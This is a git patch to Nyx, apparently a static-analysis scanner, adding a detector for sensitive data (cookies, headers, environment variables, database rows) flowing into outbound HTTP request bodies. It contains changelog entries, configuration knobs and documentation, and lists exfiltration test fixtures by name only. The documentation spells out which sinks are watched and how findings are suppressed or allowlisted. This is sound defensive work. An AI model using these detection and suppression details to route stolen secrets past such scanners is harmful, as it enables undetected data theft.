From 58f1794a4e40210052af84d180472e0ddfacbbf2 Mon Sep 17 00:00:00 2001 From: Eli Peter <54954007+elicpeter@users.noreply.github.com> Date: Fri, 1 May 2026 10:59:52 -0400 Subject: [PATCH] Added Cap::DATA_EXFIL and taint fp and fn fixes on real repos (#59) * feat: Enhance data exfiltration detection with source sensitivity gating for cookies and headers * feat: Implement cross-file data exfiltration detection with parameter-specific gate filters * feat: Add calibration tests and refine DATA_EXFIL severity scoring logic * feat: Introduce per-detector configuration for data exfiltration suppression * feat: Enhance DATA_EXFIL findings with destination field tracking in diagnostics and SARIF output * feat: Add tainted body and URL handling for data exfiltration detection * feat: Add integration tests and fixtures for DATA_EXFIL and SSRF detection in Go * feat: Add Java integration tests and fixtures for DATA_EXFIL detection across multiple HTTP clients * feat: Add synthetic externals handling for closure-captured variables in SSA * feat: Implement closure-based suppression for resource leak findings * feat: Add regression guards for shell-injection and taint propagation in for-of destructure patterns * feat: Implement constructor cap narrowing for data exfiltration detection in HTTP request builders * feat: Add gated sinks for data exfiltration detection in C and C++ using curl_easy_setopt * feat: Implement DATA_EXFIL cap parity for backwards analysis and add integration tests * feat: Add data exfiltration sinks for various languages and enhance documentation * refactor: Simplify formatting and improve readability in various files * refactor: Improve readability by simplifying conditional statements and adding clippy linting * docs: Update CHANGELOG and comments for data exfiltration features and configuration * docs: Clarify configuration instructions for data exfiltration trusted destinations * docs: Enhance comments for evidence routing logic in data exfiltration --- 
CHANGELOG.md | 12 +- README.md | 2 +- benches/scan_bench.rs | 1 + default-nyx.conf | 25 + docs/advanced-analysis.md | 13 + docs/configuration.md | 23 +- docs/detectors.md | 6 +- docs/detectors/taint.md | 122 ++- frontend/src/pages/FindingDetailPage.tsx | 9 +- src/ast.rs | 170 +++- src/cfg/cfg_tests.rs | 1 + src/cfg/helpers.rs | 17 +- src/cfg/literals.rs | 403 +++++++++- src/cfg/mod.rs | 317 +++++++- src/cfg_analysis/guards.rs | 46 +- src/cfg_analysis/mod.rs | 7 + src/cfg_analysis/resources.rs | 17 + src/cfg_analysis/tests.rs | 6 + src/commands/mod.rs | 4 + src/constraint/domain.rs | 2 + src/constraint/lower.rs | 2 + src/database.rs | 63 ++ src/evidence.rs | 80 +- src/labels/c.rs | 29 +- src/labels/cpp.rs | 24 +- src/labels/go.rs | 380 ++++++++- src/labels/java.rs | 82 ++ src/labels/javascript.rs | 199 ++++- src/labels/mod.rs | 178 +++- src/labels/php.rs | 63 +- src/labels/python.rs | 760 +++++++++++++++++- src/labels/ruby.rs | 59 ++ src/labels/rust.rs | 118 +++ src/labels/typescript.rs | 149 +++- src/output.rs | 12 + src/pointer/analysis.rs | 4 + src/rank.rs | 11 +- src/server/debug.rs | 4 + src/server/owasp.rs | 28 + src/server/routes/debug.rs | 8 + src/ssa/alias.rs | 2 + src/ssa/const_prop.rs | 2 + src/ssa/copy_prop.rs | 14 + src/ssa/dce.rs | 22 + src/ssa/invariants.rs | 8 + src/ssa/ir.rs | 23 +- src/ssa/lower.rs | 81 +- src/ssa/param_points_to.rs | 2 + src/ssa/static_map.rs | 2 + src/ssa/type_facts.rs | 131 ++- src/state/facts.rs | 47 +- src/state/mod.rs | 97 +++ src/state/transfer.rs | 13 + src/summary/ssa_summary.rs | 33 + src/summary/tests.rs | 16 + src/symex/executor.rs | 16 + src/symex/loops.rs | 22 + src/symex/mod.rs | 8 + src/symex/state.rs | 12 + src/symex/transfer.rs | 15 + src/symex/witness.rs | 31 +- src/taint/backwards.rs | 46 ++ src/taint/ssa_transfer/mod.rs | 482 ++++++++++- src/taint/ssa_transfer/state.rs | 2 + src/taint/ssa_transfer/summary_extract.rs | 32 + src/taint/ssa_transfer/tests.rs | 30 + src/utils/config.rs | 15 + 
src/utils/detector_options.rs | 129 +++ src/utils/mod.rs | 2 + tests/backwards_analysis_tests.rs | 28 +- .../c/data_exfil/exfil_curl_postfields_env.c | 17 + .../c/safe/safe_data_exfil_user_input_echo.c | 16 + .../data_exfil/exfil_http_post_cookie_body.go | 14 + .../safe/safe_data_exfil_user_input_echo.go | 15 + .../data_exfil/DataExfilJdkHttpClient.java | 23 + .../java/data_exfil/DataExfilOkHttp.java | 24 + .../data_exfil/exfil_fetch_cookie_body.js | 10 + .../exfil_fetch_external_destination.js | 10 + .../data_exfil/exfil_xhr_send_header.js | 9 + .../safe/safe_data_exfil_sanitizer_wrap.js | 8 + .../safe/safe_data_exfil_user_input_echo.js | 10 + .../data_exfil/exfil_httpx_async_post_env.py | 17 + .../exfil_requests_post_env_dict.py | 16 + .../safe/safe_data_exfil_user_input_echo.py | 14 + .../data_exfil/exfil_net_http_post_cookie.rb | 10 + .../safe/safe_data_exfil_user_input_echo.rb | 12 + .../rust/data_exfil/exfil_reqwest_form_env.rs | 10 + .../data_exfil/exfil_fetch_cookie_body.ts | 10 + .../data_exfil/exfil_fetch_header_body.ts | 10 + tests/benchmark/ground_truth.json | 572 ++++++++++++- tests/benchmark/results/latest.json | 606 +++++++++++--- tests/benchmark_test.rs | 28 + tests/calibration_data_exfil.rs | 283 +++++++ tests/cross_file_data_exfil_split_tests.rs | 48 ++ tests/data_exfil_go_integration_tests.rs | 212 +++++ tests/data_exfil_java_integration_tests.rs | 138 ++++ tests/db_corruption_tests.rs | 9 +- tests/fetch_data_exfil_integration_tests.rs | 110 ++- tests/fetch_data_exfil_suppression_tests.rs | 142 ++++ .../caller_body_tainted.js | 16 + .../caller_url_tainted.js | 14 + .../expectations.json | 22 + .../cross_file_data_exfil_split/helper.js | 10 + .../caller_body_tainted.go | 17 + .../caller_url_tainted.go | 16 + .../expectations.json | 22 + .../cross_file_go_data_exfil/helper.go | 16 + .../caller_body_tainted.py | 18 + .../caller_url_tainted.py | 17 + .../expectations.json | 22 + .../cross_file_python_data_exfil/helper.py | 12 + 
.../fixtures/demand_driven_data_exfil/app.py | 20 + .../expectations.json | 16 + tests/fixtures/go/data_exfil_http_post.go | 19 + tests/fixtures/go/data_exfil_map_assign.go | 27 + .../fixtures/go/data_exfil_new_request_do.go | 24 + tests/fixtures/go/data_exfil_post_form.go | 18 + .../go/data_exfil_user_input_silenced.go | 19 + tests/fixtures/go/ssrf_url_tainted.go | 18 + .../java/data_exfil_apache_httpclient.java | 27 + .../java/data_exfil_jdk_httpclient.java | 28 + tests/fixtures/java/data_exfil_okhttp.java | 28 + .../java/data_exfil_resttemplate.java | 23 + tests/fixtures/java/data_exfil_webclient.java | 20 + .../java/ssrf_url_only_no_data_exfil.java | 25 + tests/fixtures/js/fetch_body_data_exfil.js | 14 +- .../fixtures/js/fetch_body_int_suppressed.js | 19 + .../js/fetch_body_user_input_silenced.js | 15 + .../fetch_data_exfil_allowlist_suppressed.js | 17 + .../fetch_data_exfil_external_destination.js | 15 + .../js/fetch_data_exfil_sanitizer_wrap.js | 13 + .../c/taint/data_exfil_curl_postfields.c | 13 + .../data_exfil_curl_postfields.expect.json | 13 + .../c/taint/data_exfil_user_input_silenced.c | 13 + ...data_exfil_user_input_silenced.expect.json | 13 + .../cpp/taint/data_exfil_curl_postfields.cpp | 13 + .../data_exfil_curl_postfields.expect.json | 13 + .../taint/data_exfil_user_input_silenced.cpp | 13 + ...data_exfil_user_input_silenced.expect.json | 13 + .../taint/array_push_data_exfil.expect.json | 19 + .../javascript/taint/array_push_data_exfil.js | 21 + .../taint/await_fetch_data_exfil.expect.json | 19 + .../taint/await_fetch_data_exfil.js | 18 + .../constructor_cap_narrow_safe.expect.json | 13 + .../taint/constructor_cap_narrow_safe.js | 17 + .../taint/fetch_session_forward.expect.json | 19 + .../javascript/taint/fetch_session_forward.js | 18 + .../taint/fetch_tainted_body_safe.expect.json | 8 +- .../data_exfil_curl_postfields.expect.json | 13 + .../php/taint/data_exfil_curl_postfields.php | 10 + ...data_exfil_user_input_silenced.expect.json | 13 + 
.../taint/data_exfil_user_input_silenced.php | 9 + .../taint/dict_set_data_exfil.expect.json | 19 + .../python/taint/dict_set_data_exfil.py | 23 + .../httpx_async_post_data_exfil.expect.json | 13 + .../taint/httpx_async_post_data_exfil.py | 20 + .../requests_post_session_token.expect.json | 13 + .../taint/requests_post_session_token.py | 18 + ...sts_post_url_tainted_ssrf_only.expect.json | 19 + .../requests_post_url_tainted_ssrf_only.py | 18 + ...uests_post_user_input_silenced.expect.json | 13 + .../requests_post_user_input_silenced.py | 19 + .../data_exfil_net_http_post.expect.json | 13 + .../ruby/taint/data_exfil_net_http_post.rb | 8 + ...data_exfil_user_input_silenced.expect.json | 13 + .../taint/data_exfil_user_input_silenced.rb | 9 + .../data_exfil_hyper_builder.expect.json | 31 + .../rust/taint/data_exfil_hyper_builder.rs | 12 + .../data_exfil_reqwest_async_send.expect.json | 19 + .../taint/data_exfil_reqwest_async_send.rs | 15 + .../taint/data_exfil_reqwest_body.expect.json | 23 + .../rust/taint/data_exfil_reqwest_body.rs | 12 + .../taint/data_exfil_reqwest_form.expect.json | 23 + .../rust/taint/data_exfil_reqwest_form.rs | 10 + .../taint/data_exfil_reqwest_json.expect.json | 23 + .../rust/taint/data_exfil_reqwest_json.rs | 10 + .../rust/taint/data_exfil_surf.expect.json | 23 + .../real_world/rust/taint/data_exfil_surf.rs | 9 + .../rust/taint/data_exfil_ureq.expect.json | 23 + .../real_world/rust/taint/data_exfil_ureq.rs | 8 + .../ssrf_url_only_no_data_exfil.expect.json | 31 + .../rust/taint/ssrf_url_only_no_data_exfil.rs | 10 + .../for_of_destructure_taint.expect.json | 14 + .../taint/for_of_destructure_taint.ts | 19 + .../taint/shell_array_safe_const.expect.json | 38 + .../taint/shell_array_safe_const.ts | 52 ++ .../taint/shell_array_via_wrapper.expect.json | 14 + .../taint/shell_array_via_wrapper.ts | 31 + tests/ssa_equivalence_tests.rs | 6 + 189 files changed, 8421 insertions(+), 383 deletions(-) create mode 100644 src/utils/detector_options.rs create 
mode 100644 tests/benchmark/corpus/c/data_exfil/exfil_curl_postfields_env.c create mode 100644 tests/benchmark/corpus/c/safe/safe_data_exfil_user_input_echo.c create mode 100644 tests/benchmark/corpus/go/data_exfil/exfil_http_post_cookie_body.go create mode 100644 tests/benchmark/corpus/go/safe/safe_data_exfil_user_input_echo.go create mode 100644 tests/benchmark/corpus/java/data_exfil/DataExfilJdkHttpClient.java create mode 100644 tests/benchmark/corpus/java/data_exfil/DataExfilOkHttp.java create mode 100644 tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_cookie_body.js create mode 100644 tests/benchmark/corpus/javascript/data_exfil/exfil_fetch_external_destination.js create mode 100644 tests/benchmark/corpus/javascript/data_exfil/exfil_xhr_send_header.js create mode 100644 tests/benchmark/corpus/javascript/safe/safe_data_exfil_sanitizer_wrap.js create mode 100644 tests/benchmark/corpus/javascript/safe/safe_data_exfil_user_input_echo.js create mode 100644 tests/benchmark/corpus/python/data_exfil/exfil_httpx_async_post_env.py create mode 100644 tests/benchmark/corpus/python/data_exfil/exfil_requests_post_env_dict.py create mode 100644 tests/benchmark/corpus/python/safe/safe_data_exfil_user_input_echo.py create mode 100644 tests/benchmark/corpus/ruby/data_exfil/exfil_net_http_post_cookie.rb create mode 100644 tests/benchmark/corpus/ruby/safe/safe_data_exfil_user_input_echo.rb create mode 100644 tests/benchmark/corpus/rust/data_exfil/exfil_reqwest_form_env.rs create mode 100644 tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_cookie_body.ts create mode 100644 tests/benchmark/corpus/typescript/data_exfil/exfil_fetch_header_body.ts create mode 100644 tests/calibration_data_exfil.rs create mode 100644 tests/cross_file_data_exfil_split_tests.rs create mode 100644 tests/data_exfil_go_integration_tests.rs create mode 100644 tests/data_exfil_java_integration_tests.rs create mode 100644 tests/fetch_data_exfil_suppression_tests.rs create mode 100644 
tests/fixtures/cross_file_data_exfil_split/caller_body_tainted.js create mode 100644 tests/fixtures/cross_file_data_exfil_split/caller_url_tainted.js create mode 100644 tests/fixtures/cross_file_data_exfil_split/expectations.json create mode 100644 tests/fixtures/cross_file_data_exfil_split/helper.js create mode 100644 tests/fixtures/cross_file_go_data_exfil/caller_body_tainted.go create mode 100644 tests/fixtures/cross_file_go_data_exfil/caller_url_tainted.go create mode 100644 tests/fixtures/cross_file_go_data_exfil/expectations.json create mode 100644 tests/fixtures/cross_file_go_data_exfil/helper.go create mode 100644 tests/fixtures/cross_file_python_data_exfil/caller_body_tainted.py create mode 100644 tests/fixtures/cross_file_python_data_exfil/caller_url_tainted.py create mode 100644 tests/fixtures/cross_file_python_data_exfil/expectations.json create mode 100644 tests/fixtures/cross_file_python_data_exfil/helper.py create mode 100644 tests/fixtures/demand_driven_data_exfil/app.py create mode 100644 tests/fixtures/demand_driven_data_exfil/expectations.json create mode 100644 tests/fixtures/go/data_exfil_http_post.go create mode 100644 tests/fixtures/go/data_exfil_map_assign.go create mode 100644 tests/fixtures/go/data_exfil_new_request_do.go create mode 100644 tests/fixtures/go/data_exfil_post_form.go create mode 100644 tests/fixtures/go/data_exfil_user_input_silenced.go create mode 100644 tests/fixtures/go/ssrf_url_tainted.go create mode 100644 tests/fixtures/java/data_exfil_apache_httpclient.java create mode 100644 tests/fixtures/java/data_exfil_jdk_httpclient.java create mode 100644 tests/fixtures/java/data_exfil_okhttp.java create mode 100644 tests/fixtures/java/data_exfil_resttemplate.java create mode 100644 tests/fixtures/java/data_exfil_webclient.java create mode 100644 tests/fixtures/java/ssrf_url_only_no_data_exfil.java create mode 100644 tests/fixtures/js/fetch_body_int_suppressed.js create mode 100644 
tests/fixtures/js/fetch_body_user_input_silenced.js create mode 100644 tests/fixtures/js/fetch_data_exfil_allowlist_suppressed.js create mode 100644 tests/fixtures/js/fetch_data_exfil_external_destination.js create mode 100644 tests/fixtures/js/fetch_data_exfil_sanitizer_wrap.js create mode 100644 tests/fixtures/real_world/c/taint/data_exfil_curl_postfields.c create mode 100644 tests/fixtures/real_world/c/taint/data_exfil_curl_postfields.expect.json create mode 100644 tests/fixtures/real_world/c/taint/data_exfil_user_input_silenced.c create mode 100644 tests/fixtures/real_world/c/taint/data_exfil_user_input_silenced.expect.json create mode 100644 tests/fixtures/real_world/cpp/taint/data_exfil_curl_postfields.cpp create mode 100644 tests/fixtures/real_world/cpp/taint/data_exfil_curl_postfields.expect.json create mode 100644 tests/fixtures/real_world/cpp/taint/data_exfil_user_input_silenced.cpp create mode 100644 tests/fixtures/real_world/cpp/taint/data_exfil_user_input_silenced.expect.json create mode 100644 tests/fixtures/real_world/javascript/taint/array_push_data_exfil.expect.json create mode 100644 tests/fixtures/real_world/javascript/taint/array_push_data_exfil.js create mode 100644 tests/fixtures/real_world/javascript/taint/await_fetch_data_exfil.expect.json create mode 100644 tests/fixtures/real_world/javascript/taint/await_fetch_data_exfil.js create mode 100644 tests/fixtures/real_world/javascript/taint/constructor_cap_narrow_safe.expect.json create mode 100644 tests/fixtures/real_world/javascript/taint/constructor_cap_narrow_safe.js create mode 100644 tests/fixtures/real_world/javascript/taint/fetch_session_forward.expect.json create mode 100644 tests/fixtures/real_world/javascript/taint/fetch_session_forward.js create mode 100644 tests/fixtures/real_world/php/taint/data_exfil_curl_postfields.expect.json create mode 100644 tests/fixtures/real_world/php/taint/data_exfil_curl_postfields.php create mode 100644 
tests/fixtures/real_world/php/taint/data_exfil_user_input_silenced.expect.json create mode 100644 tests/fixtures/real_world/php/taint/data_exfil_user_input_silenced.php create mode 100644 tests/fixtures/real_world/python/taint/dict_set_data_exfil.expect.json create mode 100644 tests/fixtures/real_world/python/taint/dict_set_data_exfil.py create mode 100644 tests/fixtures/real_world/python/taint/httpx_async_post_data_exfil.expect.json create mode 100644 tests/fixtures/real_world/python/taint/httpx_async_post_data_exfil.py create mode 100644 tests/fixtures/real_world/python/taint/requests_post_session_token.expect.json create mode 100644 tests/fixtures/real_world/python/taint/requests_post_session_token.py create mode 100644 tests/fixtures/real_world/python/taint/requests_post_url_tainted_ssrf_only.expect.json create mode 100644 tests/fixtures/real_world/python/taint/requests_post_url_tainted_ssrf_only.py create mode 100644 tests/fixtures/real_world/python/taint/requests_post_user_input_silenced.expect.json create mode 100644 tests/fixtures/real_world/python/taint/requests_post_user_input_silenced.py create mode 100644 tests/fixtures/real_world/ruby/taint/data_exfil_net_http_post.expect.json create mode 100644 tests/fixtures/real_world/ruby/taint/data_exfil_net_http_post.rb create mode 100644 tests/fixtures/real_world/ruby/taint/data_exfil_user_input_silenced.expect.json create mode 100644 tests/fixtures/real_world/ruby/taint/data_exfil_user_input_silenced.rb create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_hyper_builder.expect.json create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_hyper_builder.rs create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_reqwest_async_send.expect.json create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_reqwest_async_send.rs create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_reqwest_body.expect.json create mode 100644 
tests/fixtures/real_world/rust/taint/data_exfil_reqwest_body.rs create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_reqwest_form.expect.json create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_reqwest_form.rs create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_reqwest_json.expect.json create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_reqwest_json.rs create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_surf.expect.json create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_surf.rs create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_ureq.expect.json create mode 100644 tests/fixtures/real_world/rust/taint/data_exfil_ureq.rs create mode 100644 tests/fixtures/real_world/rust/taint/ssrf_url_only_no_data_exfil.expect.json create mode 100644 tests/fixtures/real_world/rust/taint/ssrf_url_only_no_data_exfil.rs create mode 100644 tests/fixtures/real_world/typescript/taint/for_of_destructure_taint.expect.json create mode 100644 tests/fixtures/real_world/typescript/taint/for_of_destructure_taint.ts create mode 100644 tests/fixtures/real_world/typescript/taint/shell_array_safe_const.expect.json create mode 100644 tests/fixtures/real_world/typescript/taint/shell_array_safe_const.ts create mode 100644 tests/fixtures/real_world/typescript/taint/shell_array_via_wrapper.expect.json create mode 100644 tests/fixtures/real_world/typescript/taint/shell_array_via_wrapper.ts diff --git a/CHANGELOG.md b/CHANGELOG.md index e7e84fd2..14f13de4 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -4,7 +4,17 @@ All notable changes to Nyx are documented here. The format is based on [Keep a C ## [Unreleased] -_No changes yet._ +### Added + +- New `taint-data-exfiltration` rule, separate from SSRF. Fires when a Sensitive-tier source (cookie, header, env, file, database, caught exception) reaches the body, headers, or json payload of an outbound HTTP call. 
Plain user input gets suppressed at emission time so a gateway echoing `req.body` back upstream is not flagged. +- Sinks ship for `fetch` body, `XMLHttpRequest.send`, Python `requests.post` and `httpx.AsyncClient.post`, Java JDK `HttpClient.send` with `BodyPublishers`, OkHttp builder chains, Apache HttpClient `execute`, RestTemplate, WebClient, Go `http.Post` and `http.NewRequest` + `Do`, Rust `reqwest`/`ureq`/`surf`/`hyper` body/json/form/multipart chains, Ruby `Net::HTTP.post` and RestClient, C and C++ `curl_easy_setopt(CURLOPT_POSTFIELDS, ...)` gated by the macro arg. +- Three suppression knobs: + - Sanitizer convention. `logEvent`, `forwardPayload`, `tracker.send`, `analytics.track`, `metrics.report`, `serializeForUpstream` are treated as `Sanitizer(data_exfil)` by default. Add your own with the standard custom-rule path. + - Trusted destination allowlist in `detectors.data_exfil.trusted_destinations`. Matched against the abstract-string domain prefix; a literal or template prefix that begins with one of these entries drops the cap. + - Detector toggle `detectors.data_exfil.enabled = false` strips the cap before emission. Other taint classes are unaffected. +- Calibration. Severity is High for cookie or env sources, Medium for header, file, database, or caught-exception sources. Confidence stays at Medium even with strong corroboration, drops to Low without abstract or symbolic backing, and drops one tier on path-validated flows. SARIF output carries a `properties.data_exfil_field` entry on data-exfil findings, set to the destination object-literal field the leak reached (`body`, `headers`, or `json`). +- Benchmark coverage. 13 vulnerable fixtures across 8 languages under `tests/benchmark/corpus/{lang}/data_exfil/` and 6 paired safe fixtures for the sensitivity gate and sanitizer convention. New `data_exfil` row in the per-class breakdown. Per-class CI floor at P, R, F1 ≥ 0.85 (current baseline is 1.000). 
+- Backwards taint walk recognises `Cap::DATA_EXFIL` and emits the same rule ID. ## [0.5.0] - 2026-04-29 diff --git a/README.md b/README.md index 1d371835..cc522345 100644 --- a/README.md +++ b/README.md @@ -194,7 +194,7 @@ kind = "sanitizer" cap = "html_escape" ``` -Or add rules interactively: `nyx config add-rule --lang javascript --matcher escapeHtml --kind sanitizer --cap html_escape`. Caps: `env_var`, `html_escape`, `shell_escape`, `url_encode`, `json_parse`, `file_io`, `fmt_string`, `sql_query`, `deserialize`, `ssrf`, `code_exec`, `crypto`, `unauthorized_id`, `all`. Full schema: [Configuration](https://elicpeter.github.io/nyx/configuration.html). +Or add rules interactively: `nyx config add-rule --lang javascript --matcher escapeHtml --kind sanitizer --cap html_escape`. Caps: `env_var`, `html_escape`, `shell_escape`, `url_encode`, `json_parse`, `file_io`, `fmt_string`, `sql_query`, `deserialize`, `ssrf`, `data_exfil`, `code_exec`, `crypto`, `unauthorized_id`, `all`. Full schema: [Configuration](https://elicpeter.github.io/nyx/configuration.html). --- diff --git a/benches/scan_bench.rs b/benches/scan_bench.rs index 472505f4..ad42c851 100644 --- a/benches/scan_bench.rs +++ b/benches/scan_bench.rs @@ -157,6 +157,7 @@ fn bench_state_analysis_only(c: &mut Criterion) { &[], &std::collections::HashSet::new(), None, + None, ) }); }); diff --git a/default-nyx.conf b/default-nyx.conf index 919635e4..81535366 100644 --- a/default-nyx.conf +++ b/default-nyx.conf @@ -299,6 +299,31 @@ interprocedural = true smt = true +# ─── Detector knobs ────────────────────────────────────────────────── +# Per-detector class suppression and enablement. These knobs target +# common false-positive classes that show up on legitimate forwarding +# pipelines (telemetry / analytics / metrics dispatch). +# +# [detectors.data_exfil] +# +# # Toggle the entire `taint-data-exfiltration` detector class. 
Set to +# # false on projects whose architecture routes user-derived payloads +# # through trusted forwarding boundaries by design. +# enabled = true +# +# # URL prefixes treated as trusted destinations. Outbound calls whose +# # destination argument has a static prefix (proven by the abstract +# # string domain or visible as a literal) matching one of these entries +# # have `Cap::DATA_EXFIL` dropped before event emission. Mirrors the +# # SSRF prefix-lock semantics. Use full origins or origin-prefixed +# # paths (e.g. "https://api.internal/") so partial matches across +# # unrelated hosts cannot occur. +# trusted_destinations = [ +# "https://api.internal/", +# "https://telemetry.example.com/", +# ] + + # ─── Per-language analysis rules ───────────────────────────────────── # [analysis.languages.javascript.auth] diff --git a/docs/advanced-analysis.md b/docs/advanced-analysis.md index b648265b..c9641ef0 100644 --- a/docs/advanced-analysis.md +++ b/docs/advanced-analysis.md @@ -245,6 +245,19 @@ cross-function body expansion. See `DEFAULT_BACKWARDS_DEPTH`, `BACKWARDS_VALUE_BUDGET`, and `MAX_BACKWARDS_CALLEE_BLOCKS` in `src/taint/backwards.rs` for the exact bounds. +**Cap parity.** The walk treats `DemandState.caps` as opaque bitflags, so +every cap defined in `src/labels/mod.rs` round-trips identically through +the demand transfer. This includes `Cap::DATA_EXFIL` (bit 13): a +`taint-data-exfiltration` forward finding receives `backwards-confirmed` +exactly like a `taint-unsanitised-flow` SQL/CMD/SSRF finding when its +demand walk reaches a Sensitive source. The cap-routing logic in +`src/ast.rs` then surfaces the rule id correctly regardless of which +direction confirmed the flow. See +`tests/backwards_analysis_tests.rs::demand_driven_suite` (the +`data_exfil` sub-case) and +`taint::backwards::tests::driver_walks_data_exfil_source_to_sink` for +the regression guards. + **Source**: [`src/taint/backwards.rs`](https://github.com/elicpeter/nyx/blob/master/src/taint/backwards.rs). 
--- diff --git a/docs/configuration.md b/docs/configuration.md index a001bf9b..dacf1b07 100644 --- a/docs/configuration.md +++ b/docs/configuration.md @@ -213,6 +213,26 @@ CLI flag map (each pair is `--enable / --no-enable`): **Explain effective engine**: pass `--explain-engine` to print the resolved engine configuration (profile + config + CLI overrides) and exit without scanning. +### `[detectors.data_exfil]` + +Per-project tuning for the `taint-data-exfiltration` rule. All fields are optional. + +| Field | Type | Default | Description | +|-------|------|---------|-------------| +| `enabled` | bool | `true` | Set `false` to strip `Cap::DATA_EXFIL` from sink caps before emission. No `taint-data-exfiltration` finding reaches the report. Other taint classes are not affected. | +| `trusted_destinations` | [string] | `[]` | URL prefixes that drop `Cap::DATA_EXFIL` on the call site. Matched against the abstract-string domain prefix of the destination arg, so a literal URL or a template literal with a static prefix both work. Use full origins or origin-pinned paths and include the trailing `/`, otherwise `https://api.` matches `https://api.evil.example.com/` too. | + +```toml +[detectors.data_exfil] +enabled = true +trusted_destinations = [ + "https://api.internal/", + "https://telemetry.example.com/", +] +``` + +For the sanitizer convention, source sensitivity gate, and per-language sink coverage, see [Detectors / Taint / DATA_EXFIL](detectors/taint.md#data_exfil-suppression-layers). + ### `[analysis.languages.<lang>]` Per-language custom rules. `<lang>` is one of: `rust`, `javascript`, `typescript`, `python`, `go`, `java`, `c`, `cpp`, `php`, `ruby`. 
@@ -232,7 +252,8 @@ kind = "sanitizer" # "source" | "sanitizer" | "sink" cap = "html_escape" # "env_var" | "html_escape" | "shell_escape" | # "url_encode" | "json_parse" | "file_io" | # "fmt_string" | "sql_query" | "deserialize" | - # "ssrf" | "code_exec" | "crypto" | "all" + # "ssrf" | "data_exfil" | "code_exec" | "crypto" | + # "unauthorized_id" | "all" ``` --- diff --git a/docs/detectors.md b/docs/detectors.md index 1400df8e..28eab269 100644 --- a/docs/detectors.md +++ b/docs/detectors.md @@ -49,11 +49,13 @@ score = severity_base + analysis_kind + evidence_strength + state_bonus - valida | Component | Values | |---|---| | Severity base | High=60, Medium=30, Low=10 | -| Analysis kind | taint=+10, state=+8, cfg with evidence=+5, cfg without evidence=+3, ast=+0 | +| Analysis kind | taint=+10, taint-data-exfiltration=+7, state=+8, cfg with evidence=+5, cfg without evidence=+3, ast=+0 | | Evidence strength | +1 per evidence item up to 4; +2 to +6 for source kind | | State bonus | use-after-close / unauthed=+6, double-close=+3, must-leak=+2, may-leak=+1 | | Validation penalty | -5 if path-validated | +DATA_EXFIL is calibrated below other taint classes by design. Severity is High only when the source carries credential / session material (cookies, env vars); other Sensitive sources (request headers, file system, database, caught exception) downgrade to Medium. Confidence is capped at Medium and only fires Medium when the abstract / symbolic domain corroborates a concrete string body reaching the outbound payload; otherwise it falls to Low. A guarded flow (`path_validated`) drops a confidence tier. The intent is to seat data-exfiltration findings below SSRF / SQLi / command-injection but above informational AST patterns. 
+ Source-kind contributions (taint only): | Source | Bonus | @@ -71,7 +73,9 @@ Approximate score ranges: | High taint with user input | 76 to 81 | | High state (use-after-close) | ~74 | | High CFG structural | 63 to 68 | +| High DATA_EXFIL (cookie / env source, body confirmed) | ~76 | | Medium taint with env source | 45 to 50 | +| Medium DATA_EXFIL (header / fs / db / caught-exception source) | 40 to 45 | | Medium state (resource leak) | ~40 | | Low AST-only pattern | ~10 | diff --git a/docs/detectors/taint.md b/docs/detectors/taint.md index 7002a3a6..5cf2b754 100644 --- a/docs/detectors/taint.md +++ b/docs/detectors/taint.md @@ -135,10 +135,130 @@ Sources, sanitizers, and sinks are linked by named capabilities. A sanitizer onl | `sql_query` | | parameterized query binders | `cursor.execute`, `db.query` with concatenation | | `deserialize` | | | `pickle.loads`, `yaml.load`, `Marshal.load` | | `ssrf` | | URL-prefix locks | `requests.get`, `fetch` URL arg, outbound HTTP destination | -| `data_exfil` | | | `fetch` body / headers / json, `XMLHttpRequest.send` body | +| `data_exfil` | cookies, headers, env, db rows, file reads (Sensitive-tier sources only) | | `fetch` body / headers / json, `XMLHttpRequest.send` body | | `code_exec` | | | `eval`, `exec`, `Function` | | `crypto` | | | weak-algorithm constructors | | `unauthorized_id` | request-bound scoped IDs (Rust auth analysis) | ownership check | row-level write | | `all` | Sources typically use `all` so they match any sink | | | Sources typically use `cap = "all"` so they match every sink. Sinks declare the specific cap they need. Sanitizers only clear the cap they name. + +## Source sensitivity + +Some detector classes need to know not just *that* a value is attacker-influenced but *what kind* of value it is. 
Each source carries a `SourceKind` (`UserInput`, `Cookie`, `Header`, `EnvironmentConfig`, `FileSystem`, `Database`, `CaughtException`, `Unknown`) and a derived sensitivity tier: + +| Tier | Source kinds | Meaning | +|---|---|---| +| `Plain` | `UserInput` (request bodies, query strings, form fields, argv, stdin) | Attacker-controlled but already in the attacker's hands. Echoing it back to them is not a disclosure. | +| `Sensitive` | `Cookie`, `Header`, `EnvironmentConfig`, `FileSystem`, `Database`, `CaughtException`, `Unknown` | Operator-bound state that should not leak across boundaries. | +| `Secret` | (reserved for explicit credential sources) | Highest tier; treated identically to `Sensitive` today. | + +`Cap::DATA_EXFIL` only fires when the contributing source is at least `Sensitive`. Plain user input flowing into an outbound `fetch` body is suppressed at finding-emission time — the canonical false-positive class for API gateways and telemetry forwarders that proxy `req.body`. SSRF and other classes are unaffected; the gate is scoped to `DATA_EXFIL`. + +If a project legitimately classifies a request body as sensitive (e.g. an internal forwarder where `req.body` carries a pre-authenticated user token), override via custom rules in `nyx.conf`: + +```toml +# Treat the forwarder's outbound payload as already-sanitized so the +# DATA_EXFIL gate stops firing on it. +[[analysis.languages.javascript.rules]] +matchers = ["sanitizeOutbound"] +kind = "sanitizer" +cap = "data_exfil" +``` + +Or re-classify the source itself with a custom Source rule whose name matches one of the Sensitive substrings (`cookie`, `header`). + +## DATA_EXFIL suppression layers + +Three knobs ship out of the box so projects can match the cap to their architecture without per-call suppressions. + +### 1. Forwarding-wrapper sanitizer convention + +A named function that exists to *forward* a payload across a known boundary is the developer's explicit decision to send the data. 
